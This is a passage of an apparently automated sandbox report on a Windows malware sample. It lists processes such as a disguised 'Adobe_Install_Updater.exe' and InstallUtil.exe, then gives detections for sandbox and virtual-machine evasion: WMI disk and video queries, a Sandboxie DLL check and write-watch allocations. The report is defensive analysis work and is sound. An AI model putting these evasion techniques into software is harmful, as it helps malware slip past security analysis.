Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: 6RE1Z857ae.exe PID: 6984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Adobe_Install_Updater.exe PID: 1576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1632, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Adobe_Install_Updater.exe PID: 2848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Plain_Checker.exe PID: 3224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Yftssfzf.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Yftssfzf.exe PID: 8060, type: MEMORYSTR
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003010000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2373598901.0000000002450000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2441230781.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2464667993.0000000002940000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2540044072.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2558260556.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2775307801.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2857282148.00000000024E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory allocated: 2D70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory allocated: 2FE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory allocated: 2D70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 1370000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 2E60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 4E60000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: FC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2C80000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4C80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory allocated: 930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory allocated: 2420000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory allocated: 4420000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1350000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3090000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2EB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory allocated: D10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory allocated: 2910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory allocated: 2860000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Memory allocated: 2D60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Memory allocated: 2FA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Memory allocated: 2DC0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: D50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 27A0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 47A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 2640000 memory reserve | memory write watch
